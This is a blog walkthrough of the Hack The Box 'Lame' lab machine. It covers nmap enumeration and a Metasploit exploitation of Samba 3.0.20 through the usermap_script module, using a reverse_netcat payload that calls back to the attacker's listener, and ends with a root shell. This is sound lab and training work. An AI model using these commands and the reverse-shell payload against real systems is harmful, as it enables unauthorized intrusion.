Hack the box Lame(HTB) write up

0
(0)
Hack the box Lame writeup

Commands used

  1. nmap -sC -sV -oV -v 10.10.10.3
  2. nmap -p 1-65535 -sV -sS -T4 -v 10.10.10.3
  3. ftp 10.10.10.3
  4. msfconsole
  5. use exploit/multi/samba/usermap_script(metasploit)
  6. set rhost 10.10.10.3(metasploit)
  7. set payload cmd/unix/reverse_netcat(metasploit)
  8. show options(metasploit)
  9. set lhost your_ip(metasploit)
  10. run(metasploit)

Tools invloved

  1. nmap
  2. metasploit

Steps involved

  1. Enumeration
  2. Searching exploit.
  3. use metasploit to exploit it.

Enumeration

Nmap

[email protected]:~/Desktop/htb/lame# nmap -sC -sV -oV -v 10.10.10.3
Warning: The -o option is deprecated. Please use -oN
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-09 09:35 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:35
Completed NSE at 09:35, 0.00s elapsed
Initiating NSE at 09:35
Completed NSE at 09:35, 0.00s elapsed
Initiating Ping Scan at 09:35
Scanning 10.10.10.3 [4 ports]
Completed Ping Scan at 09:35, 0.44s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:35
Completed Parallel DNS resolution of 1 host. at 09:35, 0.00s elapsed
Initiating SYN Stealth Scan at 09:35
Scanning 10.10.10.3 [1000 ports]
Discovered open port 445/tcp on 10.10.10.3
Discovered open port 22/tcp on 10.10.10.3
Discovered open port 139/tcp on 10.10.10.3
Discovered open port 21/tcp on 10.10.10.3
Completed SYN Stealth Scan at 09:35, 25.69s elapsed (1000 total ports)
Initiating Service scan at 09:35
Scanning 4 services on 10.10.10.3
Completed Service scan at 09:35, 12.08s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.10.3.
Initiating NSE at 09:35
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 09:36, 40.17s elapsed
Initiating NSE at 09:36
Completed NSE at 09:36, 0.01s elapsed
Nmap scan report for 10.10.10.3
Host is up (0.39s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.14.20 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) | 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|clock-skew: mean: 4h04m49s, deviation: 0s, median: 4h04m49s | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | NetBIOS computer name: | Workgroup: WORKGROUP\x00 | System time: 2020-04-09T09:40:44-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
NSE: Script Post-scanning.
Initiating NSE at 09:36
Completed NSE at 09:36, 0.00s elapsed
Initiating NSE at 09:36
Completed NSE at 09:36, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.67 seconds
Raw packets sent: 2013 (88.548KB) | Rcvd: 20 (908B)
Hack the box Lame writeup

Full port scan

It’s always good to a full port scan while enumerating further.

nmap -p 1-65535 -sV -sS -T4 -v 10.10.10.3
Hack the box Lame writeup

And we found another port 3632.

Searching exploit

The first thing i do is check for the exploits present for the services which don’t have the latest versions.

Let us se whats is in ftp

anonymous login was allowed but didn’t have anything in it.

Hack the box Lame writeup

But the thing that attracted me was samba server.

So i looked for the exploits of that version.And i got a metasploit module for that. (445/tcp open netbios-ssn Samba smbd 3.0.20-Debian)

Hack the box Lame writeup

now time for exploiting!

Using metasploit to exploit it.

msf5 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.3 yes The target address range or CIDR identifier
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.20 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Hack the box Lame writeup

For getting lhost

Hack the box Lame writeup

Now lets exploit it .

Hack the box Lame writeup

I got a root shell directly.

cd root
ls
Desktop
reset_logs.sh
root.txt
vnc.log
cat root.txt
92##########################48a4e9df
cd home

How useful was this post?

Click on a star to rate it!

Average rating 0 / 5. Vote count: 0

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

1 thought on “Hack the box Lame(HTB) write up”

Leave a Comment

X
wpChatIcon
0 Shares
Tweet
Share
Share
Pin